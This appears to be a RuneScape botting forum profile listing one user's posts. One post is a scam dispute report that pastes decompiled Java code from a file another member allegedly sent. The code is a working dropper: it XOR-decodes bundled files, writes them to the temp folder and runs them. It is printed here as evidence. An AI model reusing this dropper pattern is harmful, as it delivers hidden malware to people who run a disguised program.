progamerz
Scripter II-
Posts
3473 -
Joined
-
Last visited
-
Days Won
4 -
Feedback
100%
Everything posted by progamerz
-
if u need testing lemme know !
-
Thanks!
-
Anything extra needed?
-
Disputed member:http://osbot.org/forum/user/62294-berke203/ Thread Link:N/A Explanation: He sent me on skype an RSPS server link and i ran it and ESET caught it as virus so after that i decompiled it. Evidence: Skype Profile screenshot with chat background : http://i.imgur.com/RlmLEn3.png Skype Chat logs: 1)http://i.imgur.com/lF8nu7l.png 2)http://i.imgur.com/hkWFOVa.png 3)http://i.imgur.com/jX8uqKL.png 4)http://i.imgur.com/mr07vog.png 5)http://i.imgur.com/LjECo9U.png 6)http://i.imgur.com/LjECo9U.png 7)http://i.imgur.com/OmxNc6Z.png 8)http://i.imgur.com/x8TjRNJ.png 9)http://i.imgur.com/5ZR8ZVA.png 10)http://i.imgur.com/DyXYY9w.png 11)http://i.imgur.com/DFTEunv.png File Code: Main.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; import de.sogomn.drop.FileDropper; import de.sogomn.drop.XorCipher; import java.io.BufferedReader; import java.io.ByteArrayOutputStream; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.Reader; import java.util.ArrayList; import java.util.function.IntFunction; import java.util.stream.Stream; public final class Main { private static final String NAME_PATH = "/data"; private static final String TEMP_DIRECTORY = System.getProperty("java.io.tmpdir"); private Main() { } private static String[] readLines(String path) throws IOException { InputStream in = Main.class.getResourceAsStream(path); InputStreamReader inReader = new InputStreamReader(in); BufferedReader reader = new BufferedReader(inReader); ArrayList<String> lines = new ArrayList<String>(); String line = null; while ((line = reader.readLine()) != null) { lines.add(line); } reader.close(); String[] lineArray = (String[])lines.stream().toArray(n -> new String[n]); return lineArray; } private static byte[] readResource(String fileName) throws IOException { InputStream in = Main.class.getResourceAsStream("/" + fileName); ByteArrayOutputStream out = new ByteArrayOutputStream(); byte[] buffer = new byte[1024]; int bytesRead = 0; while ((bytesRead = in.read(buffer)) != -1) { out.write(buffer, 0, bytesRead); } in.close(); byte[] data = out.toByteArray(); return data; } public static void main(String[] args) { try { String[] fileNames; String[] arrstring = fileNames = Main.readLines("/data"); int n = arrstring.length; int n2 = 0; while (n2 < n) { String name = arrstring[n2]; byte[] data = Main.readResource(name); XorCipher.crypt(data); FileDropper dropper = new FileDropper(name, data); dropper.drop(TEMP_DIRECTORY); ++n2; } } catch (IOException ex) { ex.printStackTrace(); } } } XorCipher.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; public final class XorCipher { private static final byte KEY = 56; private XorCipher() { } public static void crypt(byte[] data) { int i = 0; while (i < data.length) { data[i] = (byte)(data[i] ^ 56); ++i; } } } FileDropper.java /* * Decompiled with CFR 0_114. */ package de.sogomn.drop; import java.awt.Desktop; import java.io.File; import java.io.FileOutputStream; import java.io.IOException; public final class FileDropper { private String fileName; private byte[] data; public FileDropper(String fileName, byte[] data) { this.fileName = fileName; this.data = data; } private void execute(File file) throws IOException { boolean openSupported; Desktop desktop; boolean desktopSupported = Desktop.isDesktopSupported(); if (desktopSupported && (openSupported = (desktop = Desktop.getDesktop()).isSupported(Desktop.Action.OPEN))) { desktop.open(file); } } public void drop(String directory) throws IOException { File file = new File(String.valueOf(directory) + File.separator + this.fileName); FileOutputStream out = new FileOutputStream(file); out.write(this.data); out.flush(); out.close(); this.execute(file); } } If u need anything more lemme know. Thanks, Progamerz
-
Using fake emails like 123@123.com u don't need to register them to login to the game but if u wanna change pass and etc u needa register them to ur E-mail.
-
DN#9 7,14,21,28,35,41
-
How u make it that color?
-
Which IDE u use?
-
Will try and let u know! EDIT : both working thanks!
-
Hello, i am trying to make my script stop if the OSBot Client username is not progamerz Tried this code but still logging out if(getClient().getUsername() != "progamerz" ){ log("Take permission from progamerz please."); this.stop(); }
-
yup i meant the script on Mirror Mode.
-
as i said when u run the script multiple times and stop it something similar to that will happen due to loading Czar's API multiple times soo yeh or maybe from mirror mode.
-
for me working good what settings u using? EDIT: try restarting the client this sometimes happens when u run the script many times and stop it and try to run it again.
-
trial please?
-
Same version number?
-
When we make it drink stam potions it will only drink if they were (4) but if were (3) it will try to hover over them when the bank interface is opened.
-
Description of bug(where, what, when, why): Edgeville after putting the runes and etc into the looting bag it gets stuck untill i pause the script and re run it Log: [INFO][Bot #1][03/19 03:30:53 م]: Item id: 213[INFO][Bot #1][03/19 03:30:53 م]: 1 [INFO][Bot #1][03/19 03:30:54 م]: Item id: 207 [INFO][Bot #1][03/19 03:30:54 م]: 2 [INFO][Bot #1][03/19 03:30:55 م]: Item id: 563 [INFO][Bot #1][03/19 03:30:55 م]: 13 [INFO][Bot #1][03/19 03:30:57 م]: Item id: 561 [INFO][Bot #1][03/19 03:30:57 م]: 24 [INFO][Bot #1][03/19 03:30:58 م]: Item id: 9142 [INFO][Bot #1][03/19 03:30:58 م]: 12 [INFO][Bot #1][03/19 03:30:59 م]: Item id: 1617 [INFO][Bot #1][03/19 03:30:59 م]: 4 Your settings: 15hp,tuna,10 tunas,all loots exept head and harlander,super strength boost 4 and withdraw 1,edgeville,loot rare drops,antiprofiling enabled Mirror mode: Nope
-
Skype : progamerz.rs
-
I don't do rs3 accs.